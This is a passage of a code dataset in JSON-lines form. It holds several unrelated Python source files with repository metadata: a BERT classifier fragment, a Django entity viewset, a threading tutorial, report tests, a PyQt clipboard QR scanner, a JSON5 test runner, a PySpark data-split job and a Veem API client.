cfg_arch.hidden_size)\n self.head = torch.nn.Linear(cfg_arch.classification_head.head_dim, cfg_arch.num_labels)\n\n self.problem_type = None\n self.num_labels = self.cfg.num_labels\n\n for name, module in self.named_modules():\n _init_module(\n name,\n module,\n self.cfg.init.type,\n self.cfg.init.std,\n self.cfg.hidden_size,\n self.cfg.num_transformer_layers,\n )\n\n def forward(self, input_ids, attention_mask: Optional[torch.Tensor] = None, labels: Optional[torch.Tensor] = None):\n logits = self.head(self.pooler(self.encoder(input_ids, attention_mask)))\n\n if labels is not None:\n if self.problem_type is None: # very much from huggingface\n if self.cfg.num_labels == 1:\n self.problem_type = \"regression\"\n elif self.cfg.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):\n self.problem_type = \"single_label_classification\"\n else:\n self.problem_type = \"multi_label_classification\"\n\n if self.problem_type == \"regression\":\n loss_fct = torch.nn.MSELoss()\n if self.num_labels == 1:\n loss = loss_fct(logits.squeeze(), labels.squeeze())\n else:\n loss = loss_fct(logits, labels)\n elif self.problem_type == \"single_label_classification\":\n loss_fct = torch.nn.CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), 
labels.view(-1))\n elif self.problem_type == \"multi_label_classification\":\n loss_fct = torch.nn.BCEWithLogitsLoss()\n loss = loss_fct(logits, labels)\n else:\n loss = logits.new_zeros((1,))\n\n return dict(logits=logits, loss=loss)\n\n\ndef _init_module(name, module, init_method, init_std=0.02, hidden_size=768, num_layers=12):\n std = init_std\n if isinstance(module, torch.nn.Linear):\n # Slightly different from the TF version which uses truncated_normal for initialization\n # cf https://github.com/pytorch/pytorch/pull/5617\n module.weight.data.normal_(mean=0.0, std=std)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, torch.nn.Embedding):\n module.weight.data.normal_(mean=0.0, std=std)\n if module.padding_idx is not None:\n module.weight.data[module.padding_idx].zero_()\n elif isinstance(module, torch.nn.LayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n","repo_name":"JeanKaddour/NoTrainNoGain","sub_path":"bert/cramming/architectures/fixed_cramlm.py","file_name":"fixed_cramlm.py","file_ext":"py","file_size_in_byte":8534,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"72"} +{"seq_id":"24156610784","text":"from django.http import HttpResponse\nfrom django.utils import timezone\nfrom drf_excel.renderers import XLSXRenderer\n\nfrom rest_framework import (\n serializers,\n status,\n)\nfrom rest_framework.decorators import renderer_classes\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ViewSet\n\nfrom drf_spectacular.utils import extend_schema\n\nfrom base.api.serializers import inline_serializer\nfrom core.api.common.mixins import FilterAPIMixin\nfrom core.api.common.openapi_serializers import (\n NotFoundResponse,\n UnauthorizedResponse,\n)\nfrom core.api.controllers import catch_use_case_errors_as_view\nfrom core.api.entities.filters.entities import EntitiesFilter\nfrom core.domain.entities.usecases.create_entity import CreateEntityUseCase\nfrom core.domain.entities.usecases.delete_entity import DeleteEntityUseCase\nfrom core.infra.attributes.models import AttributeValue\nfrom core.infra.attributes.repositories.attribute import attribute_read_repository\nfrom core.infra.entities.constants import XLSX_FILE_NAME\nfrom core.infra.entities.models import Entity\nfrom core.infra.entities.repositories.entities import entity_read_repository\nfrom core.infra.entities.repositories.entity_types import entity_type_read_repository\nfrom core.infra.entities.resourses import EntityResource\n\n\nclass EntityViewSet(FilterAPIMixin, ViewSet):\n class CreateEntitySerializer(serializers.Serializer):\n title = serializers.CharField(max_length=1024)\n type = serializers.PrimaryKeyRelatedField(queryset=entity_type_read_repository.get_many())\n parent = serializers.PrimaryKeyRelatedField(\n required=False,\n queryset=entity_read_repository.get_many(), # type: ignore\n )\n attributes = serializers.ListSerializer(\n required=False,\n child=inline_serializer(\n 'CreateEntityAttributeSerializer',\n fields={\n 'id': serializers.PrimaryKeyRelatedField(queryset=attribute_read_repository.get_many()),\n 'value': serializers.CharField(max_length=1024),\n },\n ),\n )\n\n class EntitySerializer(serializers.Serializer):\n id = serializers.IntegerField()\n title = serializers.CharField(max_length=1024)\n type = 
inline_serializer(\n 'EntityEntityTypeSerializer',\n fields={\n 'id': serializers.IntegerField(),\n 'title': serializers.CharField(max_length=1024),\n },\n )\n parent = inline_serializer(\n 'EntityEntityParentSerializer',\n required=False,\n fields={\n 'id': serializers.IntegerField(),\n 'title': serializers.CharField(max_length=1024),\n 'type': serializers.CharField(max_length=1024, source='type.title'),\n },\n )\n creator = inline_serializer(\n 'EntityEntityCreatorSerializer',\n fields={\n 'id': serializers.IntegerField(),\n 'last_name': serializers.CharField(max_length=64),\n 'first_name': serializers.CharField(max_length=64),\n 'middle_name': serializers.CharField(\n max_length=64,\n required=False,\n allow_null=True,\n ),\n },\n )\n attributes = serializers.ListSerializer(\n required=False,\n child=inline_serializer(\n 'EntityAttributeSerializer',\n fields={\n 'id': serializers.IntegerField(),\n 'title': serializers.CharField(max_length=1024),\n 'value': serializers.CharField(max_length=1024),\n 'measurement': serializers.CharField(max_length=256, source='measurement.title', allow_null=True),\n 'value_type': serializers.CharField(max_length=64, source='value_type.title'),\n },\n ),\n )\n\n class EntityListSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n title = serializers.CharField(max_length=1024)\n parent = inline_serializer(\n 'EntityEntityParentSerializer',\n required=False,\n fields={\n 'id': serializers.IntegerField(),\n 'title': serializers.CharField(max_length=1024),\n },\n )\n type = inline_serializer(\n 'EntityEntityTypeSerializer',\n required=False,\n fields={\n 'id': serializers.IntegerField(),\n 'title': serializers.CharField(max_length=1024),\n },\n )\n creator = inline_serializer(\n 'EntityEntityCreatorSerializer',\n fields={\n 'id': serializers.IntegerField(),\n 'full_name': serializers.CharField(max_length=256),\n },\n )\n\n permission_classes = []\n filterset_class = EntitiesFilter\n\n @extend_schema(\n operation_id='createEntity',\n description='Метод по созданию объекта',\n request=CreateEntitySerializer,\n summary='CreateEntity',\n responses={\n status.HTTP_201_CREATED: EntitySerializer,\n status.HTTP_401_UNAUTHORIZED: UnauthorizedResponse,\n },\n )\n @catch_use_case_errors_as_view\n def create(self, request, *args, **kwargs):\n in_serializer = self.CreateEntitySerializer(data=request.data)\n in_serializer.is_valid(raise_exception=True)\n\n use_case = CreateEntityUseCase(\n initiator=request.user,\n title=in_serializer.validated_data['title'],\n type=in_serializer.validated_data['type'],\n creator=request.user,\n parent=in_serializer.validated_data.get('parent'),\n attribute_values=[\n AttributeValue(attribute=attribute['id'], value=attribute['value'])\n for attribute in in_serializer.validated_data.get('attributes', [])\n ],\n )\n\n entity = use_case.execute()\n entity = entity_read_repository.filter_by_pk(entity.pk).with_all_relations().first()\n out_serializer = self.EntitySerializer(instance=entity)\n\n return Response(out_serializer.data, status=status.HTTP_201_CREATED)\n\n @extend_schema(\n operation_id='getEntity',\n description='Метод по получению информации об объекте',\n summary='Get Entity',\n responses={\n status.HTTP_200_OK: EntitySerializer,\n status.HTTP_401_UNAUTHORIZED: UnauthorizedResponse,\n status.HTTP_404_NOT_FOUND: NotFoundResponse,\n },\n )\n def retrieve(self, request, pk, *args, **kwargs):\n get_object_or_404(Entity, id=pk)\n entity = entity_read_repository.filter_by_pk(pk).with_all_relations().first()\n 
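# serialize the re-fetched entity so the nested type/creator/attribute fields resolve from the preloaded relations\n        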
out_serializer = self.EntitySerializer(instance=entity)\n return Response(out_serializer.data)\n\n @extend_schema(\n operation_id='getEntities',\n description='Метод по получению списка объектов',\n summary='Get Entities',\n responses={\n status.HTTP_200_OK: EntityListSerializer(many=True),\n status.HTTP_401_UNAUTHORIZED: UnauthorizedResponse,\n status.HTTP_404_NOT_FOUND: NotFoundResponse,\n },\n )\n def list(self, request, *args, **kwargs):\n entities = self.filter_queryset(entity_read_repository.get_undeleted().with_all_relations().order_by('pk'))\n out_serializer = self.EntityListSerializer(entities, many=True)\n response: HttpResponse | Response = Response(out_serializer.data)\n if request.META.get('HTTP_ACCEPT') == 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet':\n dataset = EntityResource().export(entities)\n response = HttpResponse(content=dataset.xlsx, content_type='application/vnd.ms-excel')\n now = timezone.now()\n response['Content-Disposition'] = (\n f'attachment; ' f'filename={XLSX_FILE_NAME.format(date=now.strftime(\"%Y:%m:%d_%H:%M:%S\"))}'\n )\n\n return response\n\n @extend_schema(\n operation_id='deleteEntity',\n description='Метод для удаления обьекта',\n summary='Delete Entity',\n responses={\n status.HTTP_200_OK: {},\n status.HTTP_401_UNAUTHORIZED: UnauthorizedResponse,\n status.HTTP_404_NOT_FOUND: NotFoundResponse,\n },\n )\n @catch_use_case_errors_as_view\n def delete(self, request, pk, *args, **kwargs):\n entity = get_object_or_404(Entity, id=pk)\n use_case = DeleteEntityUseCase(\n initiator=request.user,\n entity=entity,\n )\n use_case.execute()\n\n return Response(status=status.HTTP_200_OK)\n","repo_name":"ZaRqax/src","sub_path":"core/api/entities/views/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":9095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70338466792","text":"import threading\nimport time\n\n\n#------------启动一个线程------------------------\n# def run(num):\n# print('子线程(%s)开始'%(threading.current_thread().name))\n# time.sleep(2)\n# print('打印')\n# time.sleep(2)\n# print('子线程(%s)结束' % (threading.current_thread().name))\n#\n# if __name__ == '__main__':\n# #任何进程默认就会启动一个线程,成为主进程,主线程可以启动新的子线程\n# print('主线程(%s)启动'%(threading.current_thread().name))\n#\n# #创建子线程\n# t = threading.Thread(target= run, name='runThread', args = (1,))\n# t.start()\n# t.join()\n# print('主线程(%s)结束'%(threading.current_thread().name))\n\n#-------------------线程间共享数据-------------------------\n'''\n线程和进程最大的不同在于,进程中的变量不共享\n线程之间所有变量都由所有线程共享,因此线程之间共享数据最大的\n危险在于多线程同时修改一个变量,容易把内容改乱了\n'''\n\n# num = 100\n# def run(n):\n# global num\n# for i in range(10000):\n# num = num + n\n# num = num - n\n#\n# if __name__=='__main__':\n# t1 = threading.Thread(target=run, args=(6,))\n# t2 = threading.Thread(target=run, args=(9,))\n# t1.start()\n# t2.start()\n# t1.join()\n# t2.join()\n# print('num=' + num)\n\n#-------------线程锁解决数据混乱------------------------\n#锁对象\n# lock = threading.Lock()\n#\n# num = 100\n# def run(n):\n# global num\n# #加锁\n# # lock.acquire()\n# # try:\n# # for i in range(10000):\n# # num = num + n\n# # num = num - n\n# # except:\n# # pass\n# # lock.release()\n#\n# #功能同上,减少死锁的可能\n# with lock:\n# for i in range(10000):\n# num = num + n\n# num = num - n\n#\n# if __name__=='__main__':\n# t1 = threading.Thread(target=run, args=(6,))\n# t2 = threading.Thread(target=run, args=(9,))\n# t1.start()\n# t2.start()\n# t1.join()\n# t2.join()\n# print('num=' + 
num)\n\n#----------------threadLocal---------------------------\n\n'''\n作用,为每个线程绑定一个数据库连接,HTTP请求,用户身份信息等,这样一个线程的所有调用\n到的处理函数都可以非常方便的访问这些资源\n'''\n\nnum = 0\n#创建一个全局的ThreadLocal对象\n#让每个线程有独立的存储空间\n#每个线程对ThreadLocal都可以读写,但互不影响\nlocal = threading.local()\nlock = threading.Lock()\n\ndef run(x, n):\n\n    x = x + n\n    x = x - n\n\ndef func(n):\n    #每个线程都有local.x,就是线程的局部变量\n    local.x = num\n    for i in range(100000000):\n        run(local.x, n)\n    print(\"%s--%d\"%(threading.current_thread().name, local.x))\n\nif __name__ == '__main__':\n    t1 = threading.Thread(target=func, args=(6,))\n    t2 = threading.Thread(target=func, args=(9,))\n    t1.start()\n    t2.start()\n    t1.join()\n    t2.join()\n    print('num=' + str(num))\n\n\n\n\n\n\n","repo_name":"zbh123/hobby","sub_path":"多任务/线程/启动一个线程.py","file_name":"启动一个线程.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"183989749","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner  # noqa\n\nfrom core.testcase import TestCase, main\nfrom core.matcher import NotEmpty\n\n\"\"\"\nАктуальный список всех ID на https://wiki.yandex-team.ru/users/tarnata/Treking-zakazov-na-Markete/\n\nПроверяем только коды.\nЗдесь НЕ проверяются конкретные тексты описаний, т.к. они будут очень часто меняться в ближайшее время\n\"\"\"\n\n\nclass T(TestCase):\n    @classmethod\n    def prepare(cls):\n        pass\n\n    # Тесты на CGI\n\n    def test_cgi_invalid(self):\n        \"\"\"\n        Запрос без параметров ведёт к ошибке\n        \"\"\"\n        response = self.report.request_json('place=delivery_status')\n        self.assertFragmentIn(response, {\"error\": {\"code\": \"INVALID_USER_CGI\"}})\n\n        self.error_log.expect(code=3043)\n\n    def test_cgi_one_param(self):\n        \"\"\"\n        Запрос одного delivery-status-id\n        \"\"\"\n        response = self.report.request_json('place=delivery_status&delivery-status-id=0')\n        self.assertFragmentIn(response, {\"results\": [{\"id\": 0}]})\n\n    def test_cgi_one_param_several_values(self):\n        \"\"\"\n        Запрос нескольких ID в одном параметре delivery-status-id\n        \"\"\"\n        response = self.report.request_json('place=delivery_status&delivery-status-id=0,1,10')\n        self.assertFragmentIn(\n            response,\n            {\n                \"results\": [\n                    {\"id\": 0},\n                    {\"id\": 1},\n                    {\"id\": 10},\n                ]\n            },\n        )\n\n    def test_cgi_several_params_one_value_per_param(self):\n        \"\"\"\n        Запрос по одному ID в нескольких параметрах delivery-status-id\n        \"\"\"\n        response = self.report.request_json(\n            'place=delivery_status&delivery-status-id=0&delivery-status-id=1&delivery-status-id=10'\n        )\n        self.assertFragmentIn(\n            response,\n            {\n                \"results\": [\n                    {\"id\": 0},\n                    {\"id\": 1},\n                    {\"id\": 10},\n                ]\n            },\n        )\n\n    def test_cgi_several_params_several_values(self):\n        \"\"\"\n        Запрос по несколько ID в нескольких параметрах delivery-status-id\n        \"\"\"\n        response = self.report.request_json('place=delivery_status&delivery-status-id=0,1&delivery-status-id=10,20,30')\n        self.assertFragmentIn(\n            response,\n            {\n                \"results\": [\n                    {\"id\": 0},\n                    {\"id\": 1},\n                    {\"id\": 10},\n                    {\"id\": 20},\n                    {\"id\": 30},\n                ]\n            },\n        )\n\n    # Тесты на выхлоп\n\n    def test_id_1(self):\n        \"\"\"\n        Проверяем код с непустыми значениями, например 1\n        \"\"\"\n        response = self.report.request_json('place=delivery_status&delivery-status-id=1')\n        self.assertFragmentIn(\n            response,\n            {\n                \"results\": [\n                    {\n                        \"entity\": \"deliveryStatus\",\n                        \"id\": 1,\n                        \"code\": \"DELIVERY_LOADED\",\n                        \"description\": NotEmpty(),\n                        \"texts\": {\n                            \"partnerInterface\": NotEmpty(),\n                            \"desktop\": NotEmpty(),\n                            \"mobile\": NotEmpty(),\n                        },\n                    }\n                ]\n            },\n        )\n\n    def 
test_absent_id(self):\n \"\"\"\n Проверка на ID, которого не существует (просто пустой результат)\n \"\"\"\n response = self.report.request_json('place=delivery_status&delivery-status-id=100500')\n self.assertFragmentNotIn(response, {\"results\": [{\"id\": 100500}]})\n\n def test_delivery_status_with_delivery_type(self):\n \"\"\"Проверяется, что для 48 статуса есть 2 варианта: для курьерки (0) и для самовывоза (1). Для других статусов есть только один вариант (0)\"\"\"\n for status, offer_shipping, delivery_type in [\n (48, \"\", 0),\n (48, \"delivery\", 0),\n (48, \"pickup\", 1),\n (49, \"\", 0),\n (49, \"delivery\", 0),\n (49, \"pickup\", 0),\n ]:\n response = self.report.request_json(\n 'place=delivery_status&delivery-status-id={}&offer-shipping={}'.format(str(status), offer_shipping)\n )\n self.assertFragmentIn(response, {\"results\": [{\"id\": status, \"deliveryType\": delivery_type}]})\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_delivery_status.py","file_name":"test_delivery_status.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27616351503","text":"# -*- coding:utf-8 -*-\n__author__ = 'ShawDa'\n\n\nclass Solution:\n def FindGreatestSumOfSubArray(self, array):\n # write code here\n res, max_sum = array[0], array[0]\n for num in array[1:]:\n res = max(num, res+num)\n max_sum = max(max_sum, res)\n return max_sum\n","repo_name":"ShawDa/Coding","sub_path":"coding-interviews/30连续子数组的最大和.py","file_name":"30连续子数组的最大和.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8211875108","text":"\n# coding: utf-8\n\n# In[ ]:\n\n\n# In[ ]:\n\n\n# In[ ]:\n\nimport scipy.ndimage as ndimage\nimport numpy as np\nimport skimage.measure\nfrom lib.resolutions import PX_TO_UM_LSM780_10x\n#from . import get_image_mask, get_cached_data, set_cached_data\n\n\n# In[ ]:\n\n\n# In[ ]:\n\n\n# We demonstrate the 10x data processing phase with an example image.\n\n# In[ ]:\n\n\n# First we segment the image using our Gabor segmentation method.\n\n# In[ ]:\n\n\n# In[ ]:\n\ndef get_top_mask(mask):\n top = mask.astype(bool).copy() \n for c in range(top.shape[1]):\n rs = np.where(top[:, c] == True)[0]\n if len(rs) != 0:\n r = rs[-1]\n top[r:,c] = True\n top = ndimage.binary_fill_holes(top)\n return top\n\n\n# We want to look at fluoresence from the top of the biofilm. To do this we use euclidian distance from the top. \n# The method measures how far each True pixel is from the nearest False pixel, the edges do not count.\n# We block off the bottom of the biofilm. \n\n# In[ ]:\n\n\n# In[ ]:\n\ndef get_distance_map(mask):\n top = get_top_mask(mask)\n top_dist = np.zeros_like(top, dtype=np.float64)\n ltop, _ = ndimage.label(top)\n props = skimage.measure.regionprops(ltop)\n start_stop_pairs = [ (p.bbox[1], p.bbox[3]) for p in props] \n for start, stop in start_stop_pairs:\n h = ndimage.distance_transform_edt(top[:, start:stop])\n top_dist[:, start:stop] = h\n\n distmap = top_dist * mask.astype(bool)\n return distmap\n\n\n# In some cases parts of the biofilm do not touch the edge of the image. \n# In this case we split each section up into sub-images and measure the distance from the edge individually. 
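This keeps the distance values of one connected region independent of every other region in the image.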
\n\n# In[ ]:\n\n\n# In[ ]:\n\n\n# We then multiply with the mask to give us a map of the euclidian distance of each pixel in the biofilm from the top. \n\n# In[ ]:\n\n\n# In[ ]:\n\n\n# def get_distance_map_cached(fn, segmenter=get_image_mask, force_recompute=0):\n# try: \n# if force_recompute:\n# 1/0\n# return get_cached_data(fn, 'distmap') \n# except (FileNotFoundError, KeyError,ZeroDivisionError) as e:\n# mask = segmenter(fn)\n# dist = get_distance_map(mask)\n# set_cached_data(fn, dist, 'distmap')\n# return dist \n\n\n# In[ ]:\n\n\n# ## Get relatively flat bits of the biofilm top edge. \n\n# In[ ]:\n\ndef get_flat_areas(top, minimum_pixel_width=100, sensitivity=3 ):\n struc = skimage.morphology.disk(1)\n erode = skimage.filters.edges.binary_erosion(top, structure=struc, border_value=1)\n edge = top - erode\n sv = skimage.filters.sobel_v(edge)\n verticals = np.sum(sv,axis=0) >= sensitivity\n verticals = verticals | (np.sum(edge, axis=0) > 2 )\n\n l, n = ndimage.label(np.invert(verticals))\n lr = skimage.morphology.remove_small_objects(l, min_size=minimum_pixel_width)\n lr = ndimage.morphology.binary_erosion(lr, structure=np.ones(int(40/PX_TO_UM),)) ## reduce influence of activation \n # near the edge of flat bits by removing 40um\n lre, n = ndimage.label(lr)\n flat_areas = np.tile(lre, top.shape[0])\n return flat_areas.reshape(top.shape)\n\n\n# In[ ]:\n\n\n# First get the edge pixels by eroding the mask and subtracting. \n\n# In[ ]:\n\n\n# Then do a Sobel transform which is the slope of the line. \n# We do a seperate vertical and horizontal Sobel transform. \n# We then sum the columns of the images. \n# In the horizontal sobel we dont get much signal, I guess positive and negative slopes cancelled out. \n# In the vertical sobel we get nice spikes when the biofilms bends in a different column so the postive and negative do not cancel out.\n# \n# We also sum the edge image and remove places where the sum indicates there was some folding over of the biofilm. \n# We add this because there were cases were the horizontal sobel said it was flat but there was a folding of the biofilm. \n\n# In[ ]:\n\n\n# To find the zones that big enough we use some the labeling functions. \n# First we label all the areas that were marked as flat. \n# Then we remove all labels that are less than a particular size.\n# Currently that is 100 pixels wide (~70\\mu m). 
\n\n# In[ ]:\n\n\n# In[ ]:\n\n","repo_name":"npmurphy/biofilm_pulse","sub_path":"lib/processing/slice10x/distance_top_mask_flat.py","file_name":"distance_top_mask_flat.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37006162527","text":"import sys\r\nimport webbrowser\r\n\r\nimport pyperclip\r\nfrom PIL import ImageGrab, BmpImagePlugin\r\nfrom PyQt5 import QtCore\r\nfrom PyQt5.QtCore import pyqtSlot, QTimer\r\nfrom PyQt5.QtWidgets import QWidget, QApplication, QDesktopWidget\r\nfrom pyzbar import pyzbar\r\n\r\nimport jumpWindow\r\n\r\n\r\ndef scan_qr_code(image):\r\n try:\r\n data = pyzbar.decode(image)\r\n return data[0].data.decode('utf-8')\r\n except (IndexError, ValueError):\r\n return ''\r\n\r\n\r\ndef get_clipboard_image():\r\n try:\r\n img = ImageGrab.grabclipboard()\r\n except OSError:\r\n img = None\r\n return img\r\n\r\n\r\nclass Widget(QWidget):\r\n\r\n def __init__(self, parent=None):\r\n super().__init__(parent)\r\n self.ui = jumpWindow.Ui_Form()\r\n self.ui.setupUi(self)\r\n self.url = ''\r\n self.img = None\r\n self.timer = QTimer(self)\r\n self.timer.timeout.connect(self.main_loop)\r\n self.timer.setInterval(2000)\r\n self.timer.start()\r\n self.timer2 = QTimer(self)\r\n self.timer2.timeout.connect(self.move_window_to_right_down)\r\n self.timer2.start(300)\r\n\r\n def move_window_to_right_down(self):\r\n screen = QDesktopWidget().screenGeometry()\r\n size = self.geometry()\r\n self.move(screen.width() - size.width(), screen.height() - size.height() - 70)\r\n\r\n @pyqtSlot()\r\n def on_copy_button_clicked(self):\r\n pyperclip.copy(self.url)\r\n\r\n @pyqtSlot()\r\n def on_jump_button_clicked(self):\r\n webbrowser.open(self.url, new=2)\r\n\r\n @pyqtSlot()\r\n def on_close_button_clicked(self):\r\n self.resize(565, 118)\r\n self.setHidden(True)\r\n # self.close()\r\n # sys.exit(app.exec_())\r\n\r\n def main_loop(self):\r\n img = get_clipboard_image()\r\n if img is None or type(img) == BmpImagePlugin.DibImageFile:\r\n print('\\rno image', end='')\r\n elif not img == self.img:\r\n self.img = img\r\n url = scan_qr_code(img)\r\n if url:\r\n self.resize(565, 118)\r\n self.url = url\r\n print(f'\\n{self.url}')\r\n self.ui.content_label.setText(self.url)\r\n self.move_window_to_right_down()\r\n self.show()\r\n # timer = QTimer(self)\r\n # timer.timeout.connect(self.on_close_button_clicked)\r\n # timer.start(5000)\r\n else:\r\n print('\\rno data', end='')\r\n else:\r\n print('\\rno new image', end='')\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n win = Widget()\r\n win.setAttribute(QtCore.Qt.WA_TranslucentBackground)\r\n # win.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"TLittlePrince/DesktopScanQRCode","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35676347577","text":"#!/usr/bin/python3\n# ===- systemtests/test.py ------------------------------------------------===//\n# * _ _ *\n# * | |_ ___ ___| |_ *\n# * | __/ _ \\/ __| __| *\n# * | || __/\\__ \\ |_ *\n# * \\__\\___||___/\\__| *\n# * *\n# ===----------------------------------------------------------------------===//\n#\n# Distributed under the Apache License v2.0.\n# See https://github.com/paulhuggett/peejay/blob/main/LICENSE.TXT\n# for license information.\n# SPDX-License-Identifier: Apache-2.0\n#\n# 
===----------------------------------------------------------------------===//\nfrom subprocess import run\nfrom os import walk\nfrom os.path import join, split, splitext\nfrom pathlib import Path\nfrom typing import Generator\nimport sys\nimport argparse\n\nEXIT_SUCCESS = 0\nEXIT_FAILURE = 1\n\ndef hidden (name:str) -> bool:\n return name.startswith(\".\")\n\ndef enumerate_files (base_path:Path, ext:str) -> Generator[Path, None, None]:\n for root, dirs, files in walk(base_path):\n # Skip 'hidden' directories.\n dirs[:] = [d for d in dirs if not hidden(d)]\n # ... and hidden files.\n files[:] = [f for f in files if not hidden(f)]\n for name in files:\n if splitext(name)[1] == ext:\n yield Path(join(root, name))\n\ndef run_tests (test_dir:Path, pj_check:Path, extension:str, exit_code:int,\n verbose:bool) -> list[bool]:\n \"\"\"\n Walks a directory hierarchy starting at test_dir and running pj-check on\n each file that has the extension given by 'extension'.\n\n :param test_dir: The directory tree containing the test inputs.\n :param pj_check: The pj-check executable path.\n :param extension: The file extension used by the tests to be parsed.\n :param exit_code: The expected exit code from pj-check. The test fails is\n a different result is produced.\n :param verbose: If true, verbose output is written to stdout.\n :result: A list of booleans. Each member is true for each passing test and\n false for each failing test.\n \"\"\"\n\n results = list()\n for p in enumerate_files(test_dir, extension):\n if verbose:\n print(p)\n res = run([pj_check, p],\n capture_output = True,\n timeout = 5, # timeout in seconds\n close_fds = True,\n universal_newlines = True)\n if verbose:\n if len(res.stdout) > 0:\n print(res.stdout)\n if len(res.stderr) > 0:\n print(res.stderr)\n results.append(res.returncode == exit_code)\n if not results[-1]:\n print('**FAIL** \"{0}\"'.format (p))\n return results\n\nTESTS = [\n (\".json\", EXIT_SUCCESS),\n (\".json5\", EXIT_SUCCESS),\n (\".js\", EXIT_FAILURE),\n (\".txt\", EXIT_FAILURE)\n]\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(prog = sys.argv[0],\n description = 'Runs the JSON5 test suite')\n parser.set_defaults(emit_header=True)\n parser.add_argument('path', help='The path of the pj-check executable', type=Path)\n parser.add_argument('--test-dir', help='The directory containing the JSON5 test suite files', type=Path, default=Path(join(split(__file__)[0], \"json5-tests\")))\n parser.add_argument('-v', '--verbose', help='Produce verbose output', action='store_true')\n\n args = parser.parse_args()\n if not args.path.is_file():\n print ('\"{0}\" is not a file: path argument must be the path of the pj-check executable'.format (args.path), file=sys.stderr)\n sys.exit(EXIT_FAILURE)\n test_dir = args.test_dir\n if not test_dir.is_dir():\n print (\"test-dir must be a directory\", file=sys.stderr)\n sys.exit(EXIT_FAILURE)\n pj_check = args.path\n # Run the tests producing a list of the results lists.\n results = [run_tests (test_dir, pj_check, ext, expected, args.verbose) for ext,expected in TESTS]\n # Flatten the list.\n flat_results = [item for sublist in results for item in sublist]\n failures = flat_results.count(False)\n print(\"PASSES: {0}, FAILURES={1}\".format(flat_results.count(True), failures))\n sys.exit(EXIT_SUCCESS if failures == 0 else 
EXIT_FAILURE)\n","repo_name":"paulhuggett/peejay","sub_path":"systemtests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74898951911","text":"import io\nimport sys\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col,when,countDistinct\nfrom pyspark.sql import functions as F\nfrom pyspark.sql import Window\n\ndef process(spark, input_file, target_path):\n click = spark.read.parquet(input_file)\n #define window\n window = Window.partitionBy(\"ad_id\")\n # aggregations for day_count column,queries for is_CPM and is_CPC columns and query for CTR\n aggregations = [F.size(F.collect_set(\"date\").over(window)).alias('day_count').cast('integer'),\\\n when(col('ad_cost_type')=='CPM',1).otherwise(0).cast('integer').alias('is_CPM'),\\\n when(col('ad_cost_type')=='CPC',1).otherwise(0).cast('integer').alias('is_CPC'),\\\n (F.count(when (col(\"event\")=='click',1)).over(window)/F.count(when (col(\"event\")=='view',1)).over(window)).alias(\"CTR\").cast(\"double\")]\n #select all necessary data\n filtered_data = click.select(col('ad_id').cast('integer'),col('target_audience_count').cast('decimal'), \\\n col('has_video').cast('integer'),col('ad_cost').cast('double'),*aggregations).dropDuplicates()\n\n \n #train_test_val split\n splits = filtered_data.randomSplit([0.5,0.25,0.25], seed = 77)\n ##save data\n splits[0].write.parquet(target_path + '/train')\n splits[1].write.parquet(target_path + '/test')\n splits[2].write.parquet(target_path + '/validate')\n \n\n\ndef main(argv):\n input_path = argv[0]\n print(\"Input path to file: \" + input_path)\n target_path = argv[1]\n print(\"Target path: \" + target_path)\n spark = _spark_session()\n process(spark, input_path, target_path)\n\n\ndef _spark_session():\n return SparkSession.builder.appName('PySparkJob').getOrCreate()\n\n\nif __name__ == \"__main__\":\n arg = sys.argv[1:]\n if len(arg) != 2:\n sys.exit(\"Input and Target path are require.\")\n else:\n main(arg)\n","repo_name":"CostiaB/spark","sub_path":"PySpark_task.py","file_name":"PySpark_task.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17505125711","text":"from veem.client.responses.page import PageResponse\nfrom veem.client.responses.account import AccountResponse\n\nfrom veem.client.base import Base\nfrom veem.utils.rest import VeemRestApi\n\nclass CustomerClient(Base):\n\n def __init__(self, config, **kwargs):\n\n self.config = config\n self.context = config.context\n self.client = VeemRestApi(self.config.url,\n self.context.session,\n dict(list=('get', '')))\n\n def list(self, request):\n \"\"\"\n Matching Veem customer email with provided email address\n\n @param request: an AccountRequest or stirng of email\n @return paginated Accounts that matches the search criteria.\n \"\"\"\n email = getattr(request, 'email', str(request))\n return self._list_response_handler(PageResponse,\n AccountResponse,\n self.client.list(\n request_params=dict(email=email),\n access_token=self.context.token,\n api_route='customers')\n 